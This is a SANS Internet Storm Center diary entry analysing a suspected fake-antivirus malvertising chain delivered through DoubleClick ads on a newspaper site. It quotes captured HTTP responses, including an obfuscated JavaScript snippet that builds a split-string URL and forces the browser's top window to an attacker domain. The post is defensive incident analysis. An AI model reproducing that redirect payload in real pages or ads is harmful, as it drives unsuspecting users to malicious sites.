Reader James ran into a Fake AV ad delivered by Double click. It is not clear if this is the result of a compromise of double click, or a paid ad that slipped through doubleclicks content review process. James started out at a local new paper web site, that like many others features ads served by double click. Luckily, James used a proxy tool (Fiddler) to record the session. Here are some of the excerpts (slightly anonymized and spaces inserted to avoid accidental clicks):
GET [...]
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Connection: Keep-Alive
Cookie: id=xxxxa||t=1352150000|et=730|cs=yyyy
The reply to this request was:
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 167
Date: Mon, 05 Nov 2012 22:32:59 GMT
document.write(script type=\text/javascript\ language=\javascript\
src=\http://inc cam paign.com/jsb.php?id=29585w=bt=ju=13\\/scriptdocument.write(
This is typical doubleclick. The add returns a reference to some javascript. At this point, this isnt quite suspicious yet. But lets see what we get back from inccampaign.com:
if we access the site with wget (but fake the user agent), we get back:
http://inc cam paign.com/pr/b/29585.jpg . This is a harmless image, advertising luxury watches (these days of course, a luxury watch ad suggests a link to spamming).
James on the other hand got the following content back (I wasnt able to reproduce this):
document.write(a href=http://pw brand.com target=_blank
img src=http://inccampaign.com/pr/b/29585.jpg style=border:none //a
var url = http:+//fav+ozek.+info/+in.ph+p?q=8+/CEg1+rjwdE+mPDwt+BLw6u+Sk36++lyOya+TxYF9+UkLXx+A==
if (window != top) { top.location.replace(url) } else { window.location.replace(url) }
The content starts very similar, but his copy included additional javascript, forwarding the user to fav ozek.info . The domain is somewhat new (October 12 2012) and registered with Privacyprotect.org. Right now, none of the domains is listed as malicious in virustotal.
Still digging deeper into this, but right now, this looks at least suspicious. Let me know if you see similar issues with double click ads.
------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.